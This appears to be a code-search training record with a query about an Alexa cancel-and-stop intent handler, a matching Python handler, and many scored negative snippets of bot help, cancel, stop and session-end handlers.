update.message.reply_text('Help!')", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def help_command(update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text('Help!')", "def help():\n print(UI.HELP)", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help():\n \n pass", "def help(self):", "def help(self):", "async def help(self, ctx):\n self.log_command_call(\"help\", ctx.message)\n await ctx.send(HELP_TEXT)\n embed_output = create_embed(description=MORE_INFO_TEXT)\n await ctx.send(embed=embed_output)", "def help(self):\n pass", "def help(self):\n pass", "def run_help(s, remainder):\n return SlackResponseText(\"help functionality is not currently implemented\")", "def help():\n print \"Help comes to those who ask\"", "def help_handler(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Use /quiz, /poll or /preview to test this bot.\")", "def help_intent_handler(handler_input):\n return help_request(handler_input, MINUS_POINTS, QUIT_MINUS_POINTS)", "def show_help(self):\n self.slack.reply('\\n\\n'.join(self.help_lines))", "def _help(update, context):\n message = '''This bot will fetch data from some public APIs, insert fetched data into \\\nGoogle spreadsheets and send url of the spreadsheet to the user. \\n\n/fetch - fetch data and return url of spreadsheet.\n/help - return help message'''\n update.message.reply_text(message)", "def switch_help(self, key, rows):\n self.controller.set_context('help')", "def help(self, update, context):\n\n message = \"Do you need help \\n Help menu shows here🤞\"\n update.message.reply_text(message)", "def help_command(update, context):\n update.message.reply_text('Let me help you. \\r\\n /help print this help \\r\\n /safety prints safety instructions \\r\\n /play start the game\\r\\n /joingroup Join CTF tg group')", "def displayhelp(self):\n helper = HelpView(self)\n helper.activateWindow()\n helper.exec()\n self.activateWindow()", "def help():", "def help_command_handler(update, context):\n update.message.reply_text('Type /start')", "def cmd_help(update, context):\n\n TEXT = f'''Hei, kamu butuh bantuan ya? {emo_hushed}, aku masih dikembangkan jadi maaf yaa kalo aku masih bingung. <br />Ini adalah perintah yang aku mengerti, silakan panggil aku dengan memberikan perintah dibawah ini yaaa {emo_wink}<br />\n /start - {emo_start} mulai dari sini yaaa kalo belum\n /help - {emo_question} butuh bantuan aku?\n /laporan - {emo_book} kamu mau melihat laporan?\n '''\n context.bot.send_message(\n chat_id=update.effective_chat.id,\n text=TEXT)", "def on_pushButtonHelp_clicked(self, checked):\n\n help = Help.MainApp()\n help.setWindowTitle('Help for ' + TITLE)\n help.show()\n\n help.textEdit.setText(helpText)", "def help_handler(self, update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text(\"Use /quiz, /start or /preview to test this \" \"bot.\")", "def help(self):\n\t\treturn", "def bot_help(bot, update, args):\n if not args:\n update.message.reply_text(helpmessages.mainHelp())\n elif args[0] == \"alert\":\n bot.sendMessage(update.message.chat_id, helpmessages.alertHelp())\n elif args[0] == \"fortune\":\n bot.sendMessage(update.message.chat_id, fortune.fortuneHelp())\n elif args[0] == \"quote\":\n bot.sendMessage(update.message.chat_id, helpmessages.quoteHelp())\n elif args[0] == \"bash\":\n bot.sendMessage(update.message.chat_id, helpmessages.bashHelp())\n else:\n update.message.reply_text(helpmessages.mainHelp())", "def test_handle_help(self):\n ret, code = self.testcommand.handle(\"team help\", user)\n self.assertEqual(ret, self.testcommand.get_help())\n self.assertEqual(code, 200)", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(messages.HELP_TEXT)", "def launchHelpWindow(self):\r\n self.popup(\"Help\",HELP,geom=\"350x200\")", "def help(update, context):\n update.message.reply_text(\n 'Do you want to request help or offer help? '\n 'Type /mainmenu command for more details.'\n )", "def help(self, msg, status, desc):\n\n msg.Chat.SendMessage(HELP_TEXT)", "def do_help(self, line):\n Cmd.do_help(self, line)", "def OnButtonAboutHelpButton(self, event):\r\n\t\twebbrowser.open(consts.URL_HELP_ABOUT)", "def onShowHelp(self, event):\r\n\t\tHelpDialog = fixfixer_help.FixFixerHelpFrame(self)\r\n\t\tHelpDialog.show()", "def askForHelp(self):\n try:\n serverResult = self.game.server.askForHelp(self.game.authKey)\n if type(serverResult) == types.ListType:\n self.help = serverResult\n self.displayHelpMessage()\n else:\n self.modeMsgBox(serverResult)\n except:\n self.modeMsgBox('askForHelp->Connection to Server Lost')", "async def send_command_help(self, ctx: Context) -> None:\n if ctx.command:\n self.bot.help_command.context = ctx\n await ctx.send_help(ctx.command)\n return\n\n await ctx.send_help()", "def get_help(request):\n return utility.respond(request, 'admin/help')", "def help(self):\n return None", "def help_command(update: Update) -> None:\n #update.message.reply_text('Help!')", "def help(self) -> str:\n\t\treturn None", "def help(self, update, context):\n\n message = update.message.text.lower().split(\" \")\n user = self.User(update)\n if len(message) > 1 and message[1] == \"me\":\n output = 'if you need help buddy, call 1201 they are good guys and they will help you'\n else:\n \"\"\"Send help when the command /help is issued.\"\"\"\n output = '/request {line} {station} \\n' \\\n '/history show/clear\\n' \\\n '/show\\n' \\\n '/cancel {line} {station}\\n' \\\n '/help'\n\n if self.data_base.check_admin(user):\n output += '\\n\\n--admin commands --\\n' \\\n '/kick\\n' \\\n '/promote {me/id}\\n' \\\n '/demote {me/id}\\n' \\\n '/stop'\n update.message.reply_text(output)\n self.data_base.log(user, update.message.text, \"*helped*\")", "def helpHelp(self):\r\n QtGui.QMessageBox.about(self, \"Help me!\",\"\"\"\r\n <p> Program sucks and you need help?\r\n <p>Email: \r\n <p><b>andrew.kolb@marquette.edu</b>\r\n <p>Or visit him in Room 230U!\r\n \"\"\")", "def help_args():\n pass", "def command_help(self, bot, update):\n\n messages = [\n 'Available commands:',\n '/who - Who is Myles?',\n '/where - Where is Myles?',\n '/tweet - What was the last tweet Myles sent?',\n '/photo - What was the last Instagram photo Myles took?',\n '/web - Where can I find Myles on the interwebs?',\n ]\n\n self.send_messages(bot, update, messages)", "def _handle_help_argument(self, arguments):\n for help_option in ['help', '--help', '-h']:\n if help_option in arguments:\n LOGGER.info(USAGE_INFORMATION)\n return exit(0)", "def help(update, context):\n\t\n\tupdate.message.reply_text('/start to start the bot')", "def handleHelp(message, commandList):\n listOfCommands = \", \".join(commandList)\n return reply(\"Text an address to this number in order to find the nearest access to a safe restrooom\")", "def OnHelp(self, event):\r\n d = wx.MessageDialog(self, \"... ... ... ... ... ... ... ... ...\", \"No help for you!\", wx.OK)\r\n d.ShowModal()\r\n d.Destroy()", "def display_help(self):\n pass", "async def help(self, ctx, *, command_name: str=None):\n bot_prefix = '@Randy '\n # Shortcut to command search\n if command_name is not None:\n return await ctx.invoke(self.cmd('help command'), cmd_name=command_name)\n\n em = discord.Embed(title='Help',\n description='**Permissions:** The permissions required to function :-\\n'\n '`Send Messages`, `Manage Messages`, `Embed Links`\\n'\n '--\\nTo get help or more information on a specific command, use:\\n'\n '`{bot_prefix}help <command name>`\\n'\n '--\\nRead my messy code [here](http://github.com/xKynn/RandomRumble)'\n '--\\nIf you like my work and would like to help me, '\n 'Ko-Fi/Paypal: [Link](https://ko-fi.com/D1D6EXXV)\\n',\n color=self.color)\n\n em.set_footer(text=\"Contact me at Demo#7645\")\n\n # This can't go in the init because help isn't loaded last & thus misses some commands\n em.add_field(name=\"Commands\", value=' • '+'\\n • '.join(f\"***{c.name}*** - {c.short_doc}\" for c in self.bot.commands if\n c.name not in ['pob', 'link', 'convert']))\n try:\n await ctx.send(embed=em)\n except:\n await ctx.send(\"`Embed Links` permission is required to see the help!\")", "def onHelpButtonClicked(self, widget):\n self.getGtkTopObject().close()", "def help(self):\r\n self._short_help(None, None, None, None)", "def get_help(intent, session):\n \n print(\"get_help: \", intent)\n\n text = HELP_MESSAGE\n if \"attributes\" in session and \"current_question\" in session[\"attributes\"]:\n attributes = session[\"attributes\"]\n frage_text = attributes[\"current_question\"]\n text += \"Ich wiederhole die letzte Frage: \" + frage_text\n else:\n frage_text = SPIELER_PROMPT_TEXT\n text += SPIELER_PROMPT_TEXT\n attributes = reset_attributes()\n \n attributes[\"current_question\"] = frage_text\n attributes[\"speech_output\"] = text\n attributes[\"reprompt_text\"] = frage_text\n\n return response(text, False, frage_text, attributes, card_text=clear_tags(HELP_MESSAGE)+\\\n \"\\n\" + build_card_content(attributes))", "async def phrase(self, ctx):\n await self.heleus.send_command_help(ctx)", "def show_help():\n pass", "def initialize_help_commands(self) -> None:\n\n @self.command(name=\"help\")\n @logger(\"all\")\n async def help_command(ctx, *args):\n if len(args) == 0:\n await ctx.message.channel.send(indie_help.summary())\n else:\n await ctx.message.channel.send(indie_help.specific(args))", "def do_help(self, arg):\n if arg:\n # Getting help for a specific command\n funcname = self._func_named(arg)\n if funcname:\n # No special behavior needed, delegate to cmd base class do_help()\n cmd.Cmd.do_help(self, funcname[3:])\n else:\n # Show a menu of what commands help can be gotten for\n self._help_menu()", "def help(update, context):\n update.message.reply_text(\"\"\"usage \n /bus <bus name> or /bus <bus name> <stop name>\n /addstop <stop name> <stop code>\n /delstop <stop name>\n /showstops\n /help\n \"\"\")\n\n # log info\n logger.info(\"help used username:{0}\".format(update.message.from_user.username))", "def help():\n last_question = session_attributes[LAST_QUESTION_KEY]\n last_extension = session_attributes[LAST_EXTENSION_KEY]\n\n if last_question == NO_QUESTION:\n return welcome()\n else:\n return question(last_question, extension=last_extension, intro=HELP_MESSAGES[last_question])", "def command_help(self, command):\n self.commands[command].command_help()", "def help(update, context):\n update.message.reply_text('Help! \\n /traccia per tracciare instantaneamente i prezzi \\n /check per far partire il check periodico \\n /stopcheck per far fermare il check periodico')", "def cmd_help(args):", "def on_help(self, event):\n\n #import documentation window here to avoid circular imports\n #if put at top of file with rest of imports.\n from documentation_window import DocumentationWindow\n\n _TreeLocation = \"user/sasgui/guiframe/data_explorer_help.html\"\n _doc_viewer = DocumentationWindow(self, -1, _TreeLocation, \"\",\n \"Data Explorer Help\")", "def help(ctx, topic, **kw):\n # The help command implementation is taken from\n # https://www.burgundywall.com/post/having-click-help-subcommand\n if topic is None:\n click.echo(ctx.parent.get_help())\n else:\n click.echo(main.commands[topic].get_help(ctx))", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Laughybot\\n\\n VERSION\\n 0.1 \\n\\nUSAGE\\n /{command} : Entrer une commande parmi celles disponibles\\n\\nCOMMADES\\n/joke => recherche une blague sur la toile\\n/start => Affiche le message d'accueil\\n/help => Affiche l'aide\")", "def onQuitHelp(self, eventDict = None):\n self.mainWindow.setStatusText(\"Press %s + shift + Q to quit\" % Naming.commandKeyName())", "def help():\n return statement(help_text)", "def test_handle_help(self):\r\n ret, code = self.testcommand.handle(\"project help\", user)\r\n self.assertEqual(ret, self.testcommand.get_help())\r\n self.assertEqual(code, 200)", "def help(ctx):\n click.echo(ctx.parent.get_help())", "def help(update, context):\n update.message.reply_text(\"Ayudame!\")", "def helpMenu(userid, args):\r\n if popuplib.isqueued(\"sourcerpg_help\", userid):\r\n return\r\n popuplib.send('sourcerpg_help', userid)", "def on_help(self):\n d = QtGui.QDialog(parent=self)\n dialog = Ui_Dialog()\n dialog.setupUi(d)\n dialog.webView.setUrl(QUrl(\"http://code.google.com/p/svg-component-creator/wiki/UserDocumentation\"))\n d.show()", "def help_me():\n print(\"i'm trapped\")", "async def help(ctx):\n\tembed = discord.Embed(description='Below Are All The Commands For SecretBot')\n\tembed.set_author(name='SecretBot Help Center')\n\tembed.add_field(name='***`!ping`***', value='Returns the bot latency', inline=False)\n\tembed.add_field(name='***`!clear`***', value='Deletes the given amount of messages(default 10) \\n***i.e. !clear 20***', inline=False)\n\tembed.add_field(name='***`!live`***', value='Shows an image with data from a live League of Legends game \\n***i.e. !live NA Test Summoner Name***', inline=False)\n\tembed.add_field(name='***`!league`***', value='Shows an image with data of a summoner \\nFor multiple summoners, split by commas \\n***i.e. !league NA Test_Summoner_Name***', inline=False)\n\tembed.add_field(name='***`!ac`***', value='Shows data on bugs, fossils, or fish\\n***i.e. !ac fish horse mackerel***', inline=False)\n\tembed.set_footer(text='SecretBot isn’t endorsed by Riot Games and doesn’t reflect the views or opinions of Riot Games or anyone officially involved in producing or managing League of Legends. League of Legends and Riot Games are trademarks or registered trademarks of Riot Games, Inc. League of Legends © Riot Games, Inc.')\n\tawait ctx.send(embed=embed)", "def __help_menu(self):\n log.debug(\"Displaying __help_menu\")\n # Create a keyboard with the user help menu\n keyboard = [[telegram.KeyboardButton(self.loc.get(\"menu_guide\"))],\n [telegram.KeyboardButton(self.loc.get(\"menu_contact_shopkeeper\"))],\n [telegram.KeyboardButton(self.loc.get(\"menu_all_cancel\"))]]\n # Send the previously created keyboard to the user (ensuring it can be clicked only 1 time)\n self.bot.send_message(self.chat.id,\n self.loc.get(\"conversation_open_help_menu\"),\n reply_markup=telegram.ReplyKeyboardMarkup(keyboard, one_time_keyboard=True))\n # Wait for a reply from the user\n selection = self.__wait_for_specific_message([\n self.loc.get(\"menu_guide\"),\n self.loc.get(\"menu_contact_shopkeeper\")\n ], cancellable=True)\n # If the user has selected the Guide option...\n if selection == self.loc.get(\"menu_guide\"):\n # Send them the bot guide\n self.bot.send_message(self.chat.id, self.loc.get(\"help_msg\"))\n # If the user has selected the Order Status option...\n elif selection == self.loc.get(\"menu_contact_shopkeeper\"):\n # Find the list of available shopkeepers\n shopkeepers = self.session.query(db.Admin).filter_by(display_on_help=True).join(db.User).all()\n # Create the string\n shopkeepers_string = \"\\n\".join([admin.user.mention() for admin in shopkeepers])\n # Send the message to the user\n self.bot.send_message(self.chat.id, self.loc.get(\"contact_shopkeeper\", shopkeepers=shopkeepers_string))\n # If the user has selected the Cancel option the function will return immediately", "def help_alias(self, mess, args):\n return self.help(mess,args)", "def habHelp(self):\n rf = os.path.join('docs','helpButtons','prefsHabitat.html')\n self.showHelpFile( rf )", "async def help(ctx, command:str=None):\n if command == None:\n embed = assemble_embed(\n title=\"Looking for help?\",\n desc=(\"Hey there, I'm a resident bot of Scioly.org!\\n\\n\" +\n \"On Discord, you can send me commands using `!` before the command name, and I will process it to help you! \" +\n \"For example, `!states`, `!events`, and `!fish` are all valid commands that can be used!\\n\\n\" +\n \"If you want to see some commands that you can use on me, just type `!list`! \" +\n \"If you need more help, please feel free to reach out to a staff member!\")\n )\n return await ctx.send(embed=embed)\n hlp = await get_help(ctx, command)\n await ctx.send(embed=hlp)" ]
[ "0.78951234", "0.7641993", "0.7596383", "0.75123024", "0.7342911", "0.7307534", "0.72152776", "0.71921116", "0.7188953", "0.7140122", "0.7140122", "0.7116266", "0.7116266", "0.7107287", "0.7099637", "0.7098016", "0.7098016", "0.7098016", "0.7098016", "0.7089918", "0.7089918", "0.7089918", "0.7089918", "0.7089555", "0.7086876", "0.7086876", "0.70506287", "0.7045832", "0.7045832", "0.7002749", "0.6982839", "0.6981912", "0.696496", "0.69461197", "0.69436723", "0.694223", "0.69336915", "0.692338", "0.6922821", "0.685666", "0.68547314", "0.68455756", "0.68448085", "0.68332803", "0.68288344", "0.68054205", "0.67878497", "0.67872745", "0.6780394", "0.67791975", "0.6773832", "0.677118", "0.6747107", "0.67469096", "0.67440856", "0.67213476", "0.67074895", "0.6696518", "0.6695141", "0.66768485", "0.66632295", "0.666079", "0.66525114", "0.66334486", "0.6618066", "0.66069704", "0.66068274", "0.6587464", "0.65868706", "0.65807617", "0.65704757", "0.65703285", "0.65680873", "0.65302235", "0.65259355", "0.65206987", "0.6520112", "0.65176827", "0.65053004", "0.6503882", "0.64787453", "0.64589167", "0.64578867", "0.64565754", "0.6452299", "0.6438602", "0.6425202", "0.642381", "0.64227927", "0.6419983", "0.6399455", "0.63948274", "0.6391821", "0.6366804", "0.63637364", "0.63548815", "0.63460416", "0.63449717" ]
0.72494954
8
Single handler for Cancel and Stop Intent.
def cancel_and_stop_intent_handler(handler_input): # type: (HandlerInput) -> Response speech_text = "Goodbye!" return handler_input.response_builder.speak(speech_text).response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cancel_and_stop_intent_handler(handler_input):\n return cancel_and_stop_request(handler_input, QUIT_MINUS_POINTS)", "def cancel_and_stop_intent_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Stopping.\"\n\n return handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Transit Time\", speech_text)).response", "def cancel(self):\n self.stop()\n self.make_callback('canceled')", "def on_cancel(self) -> None:\n pass", "def on_cancel(self) -> None:\n pass", "def OnCancel(self, event):\n pass", "def OnCancel(self, event):\n pass", "def cancel_callback(self):\n pass", "def cancel(self):\n self.on_cancel()", "def handleCancel(self):\n self.isTerminated = True\n self.terminate()", "def cancel_and_stop_intent_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Thanks for playing!!\"\n\n handler_input.response_builder.speak(\n speech_text).set_should_end_session(True)\n return handler_input.response_builder.response", "async def on_cancel(self, payload):\n\n await self._delete_message(0)\n self.stop()", "def cancel(self):", "def cancel(self):", "def cancel(self):", "async def cancel(self, ctx):\n\n return", "def onCancel(self, fetcher): #$NON-NLS-1$\r", "def cancel():", "async def cancel_handler(message: types.Message, state, raw_state=None):\n # Cancel state and inform user about it\n await state.finish()\n # And remove keyboard (just in case)\n await reply(message, \"Canceled.\", reply_markup=types.ReplyKeyboardRemove())", "def _onCancel(self):\n\n self.close()", "def on_cancel(self, goal_handle):\n\t\trospy.loginfo(\"[BRIDGE] Received cancel request.\")\n\t\tgoal_id = goal_handle.get_goal_id()", "def cancel_callback(self, goal_handle):\n self.get_logger().info('Received cancel request')\n return CancelResponse.ACCEPT", "def on_cancel(self, *args):\n self.response(Gtk.ResponseType.CANCEL)", "async def cancel(self):\n\n await self.cb_0.cancel()\n await self.cb_1.cancel()", "def cancel(self):\n pass", "def on_cancel(self):\n self.state = CANCELED\n self._reject()", "def onstop(self, sender, **kwargs):\n pass", "def cancel_stop(cls):\n cls._set_mode_running()", "def on_cancel(self):\n self.quit()", "def on_cancel(self):\n self.quit()", "def on_cancel(self):\n self.quit()", "def on_cancel(self):\n self.quit()", "def do_cancel(self):\r\n self.write({'cancelled': True})", "def on_cancel(self, _):\n self.destroy()", "def on_cancel_pressed(self, oncancel_pressed_callback, app=None):\n if app is not None:\n self._app = app\n self._oncancel_pressed_callback = oncancel_pressed_callback", "def __onCancel(self, ev):\n\n self.__value = None\n self.__cancelled = True\n\n if self.IsModal():\n self.EndModal(wx.ID_CANCEL)\n else:\n self.SetReturnCode(wx.ID_CANCEL)\n self.Close()", "def cancel(self): #$NON-NLS-1$\r", "def _stop(self):", "def cancel(self):\n self.__canceled = True", "def cancel(self):\n self.cancelled = True", "def cancel(self):\n self.cancelled = True", "def cancel(self):\n return self.RES_OK", "def _cancel(self, __button):\r\n\r\n self.assistant.destroy()", "def _cancel(self, __button):\r\n\r\n self.assistant.destroy()", "def cancel(self):\n self.cancelled.set()", "def _chain_cancel(_):\n if recvd.done():\n return\n if f.cancelled():\n recvd.cancel()", "def onBtnCancelClicked(self):\n self.close()", "def on_stop(self):\n print(\"策略停止\")\n\n self.put_event()", "def stop(self, signal):\n pass", "def stop(self, signal):\n pass", "def action_cancel(self):\n ids = isinstance(self.ids, (int)) and [self.ids] or self.ids\n context = self._context or {}\n self.cancel_move()\n self.clear_wh_lines()\n return True", "async def async_cancel(self):\n raise NotImplementedError", "def cancel(self):\n\n self.end()\n super().cancel()", "def cancel(self):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)", "def __handle_action_stop(self, file_name: str):\n # value is double encoded\n file_name = unquote(file_name)\n\n command = Controller.Command(Controller.Command.Action.STOP, file_name)\n callback = WebResponseActionCallback()\n command.add_callback(callback)\n self.__controller.queue_command(command)\n callback.wait()\n if callback.success:\n return HTTPResponse(body=\"Stopped file '{}'\".format(file_name))\n else:\n return HTTPResponse(body=callback.error, status=400)", "def cancel_inner():\n kernel32.SetEvent(cancel_event)", "def cancel(self):\n GameLoop.getInstance()._cancelation_token = True", "def force_stop(self):\n #cancel any current request:\n self._cancel_current_request()", "def cancel(self, uid, states=None):\n\n # sets the status if `uid` to canceled.", "def accept_cancel(self):\n self.ok = False\n self.destroy()", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def stop_cb(evt): \n speech_recognizer.stop_continuous_recognition()\n nonlocal done\n done = True", "def cancel(self):\n # terminate background thread\n self.stop.set()\n CoordinationAdaptor.delete_cds(self.url)", "def _cancel(self, __button):\r\n\r\n self.assistant.destroy()\r\n\r\n return True", "def _cancel(self, __button):\r\n\r\n self.assistant.destroy()\r\n\r\n return True", "def on_stop(self):\n self.write_log(\"策略停止\")\n self.cta_engine.event_engine.unregister(EVENT_TIMER, self.process_timer_event)", "def iscanceled(*args):", "def cancel(self) -> asyncio.Future:\n pass # pragma: no cover", "def reqGlobalCancel(self):\r\n self.ib.reqGlobalCancel()\r\n logging.info('reqGlobalCancel')", "def action_cancel(self):\n self.state = 'canceled'", "def mark_cancelled(self):\n self.status = STATUS_CANCELED", "def stop_cb(evt):\n # print('CLOSING on {}'.format(evt))\n speech_recognizer.stop_continuous_recognition()\n global done\n done = True", "def stopTask(self, c, card):\r\n \r\n if card == 'A':\r\n if getattr(self, 'taskHandleA', None) is not None:\r\n self._check( \r\n self.nidaq.DAQmxStopTask(self.taskHandleA) \r\n )\r\n \r\n \r\n elif card == 'B': \r\n if getattr(self, 'taskHandleB', None) is not None:\r\n self._check( \r\n self.nidaq.DAQmxStopTask(self.taskHandleB) \r\n )\r\n \r\n \r\n elif card == 'C':\r\n if getattr(self, 'taskHandleC', None) is not None:\r\n self._check( \r\n self.nidaq.DAQmxStopTask(self.taskHandleC) \r\n )", "def stop(self):\n self.on_stop()", "def on_stop(self):\n self.write_log(\"策略停止\")\n\n self.put_event()", "def cancel_operation(self):\n # <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>\n self.proceed = False\n self.entry_view.destroy()", "def pressCancel(self):\n self.close()", "def on_stop(self):\n self.write_log(\"策略停止\")\n self.put_event()", "def request_stop(self):\n self._messaged.emit((\"stop\",None,0,None))", "def cancel(self, membership, callback=None):", "def stop(update, context) -> None:\n update.message.reply_text('Okay, bye.')\n\n logger.info(\"User [%s] canceled conversation using command [/stop].\",\n update.message.from_user.first_name)\n return END", "def Stop(self, *_):\n self.Log('Stopping...')\n self._stop = True", "def _cancel(self, __button):\r\n\r\n self.destroy()", "def stop(self) -> None:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def _cancel(self, __button=None):\r\n\r\n self.destroy()", "def cancel(update: Update, context: CallbackContext) -> int:\n update.message.reply_text(\n 'Bye! I hope we can talk again some day.', reply_markup=ReplyKeyboardRemove()\n )\n\n logger.info(\"User [%s] canceled BBT conversation using command [/stop].\",\n update.message.from_user.first_name)\n return ConversationHandler.END", "def Stop(self, request, context):\r\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\r\n context.set_details('Method not implemented!')\r\n raise NotImplementedError('Method not implemented!')", "def stop(self):" ]
[ "0.69462967", "0.67611676", "0.66303724", "0.6449503", "0.6449503", "0.64251965", "0.64251965", "0.6423484", "0.62693846", "0.61464477", "0.6137985", "0.6082715", "0.6080662", "0.6080662", "0.6080662", "0.60464203", "0.60244685", "0.6008756", "0.59916556", "0.5986091", "0.5949461", "0.5948651", "0.59436417", "0.5925479", "0.58696693", "0.58499515", "0.5841929", "0.5780492", "0.5772432", "0.5772432", "0.5772432", "0.5772432", "0.5692817", "0.56836265", "0.56836146", "0.5641666", "0.5621539", "0.5611371", "0.55990183", "0.5587436", "0.5587436", "0.5583813", "0.5576472", "0.5576472", "0.5512149", "0.5501427", "0.54970723", "0.54952973", "0.54902303", "0.54902303", "0.54840016", "0.54779404", "0.54746586", "0.5473962", "0.54638153", "0.5445526", "0.5436865", "0.54321885", "0.5418493", "0.54050106", "0.53914404", "0.53914404", "0.53914404", "0.53914404", "0.53914404", "0.53914404", "0.53914404", "0.53908324", "0.53874326", "0.53746706", "0.53746706", "0.5358957", "0.5357104", "0.53366774", "0.5334347", "0.53279394", "0.5324248", "0.5317712", "0.53137743", "0.5306864", "0.53015476", "0.5293719", "0.52918196", "0.52837497", "0.5283573", "0.5281176", "0.52736485", "0.52720284", "0.5260218", "0.5256821", "0.5250117", "0.5250117", "0.5250117", "0.5250117", "0.52420324", "0.5232636", "0.52264476", "0.5219888" ]
0.63202274
10
Handler for Session End.
def session_ended_request_handler(handler_input): # type: (HandlerInput) -> Response return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def end_session(self):\n\t\t...", "def on_session_ended(session_ended_request, session):\n print(\"END SESSION\")\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):", "def on_session_ended():\n #print(\"on_session_ended\")", "def on_session_ended():\n #print(\"on_session_ended\")", "def on_session_finish(context):\n pass", "def EndSession( self ):\r\n\r\n self._socket.write( 'X' ) \r\n # self._connection.write( 'X' ).flush() \r\n\r\n return self.GetServerResponse()", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\r\n 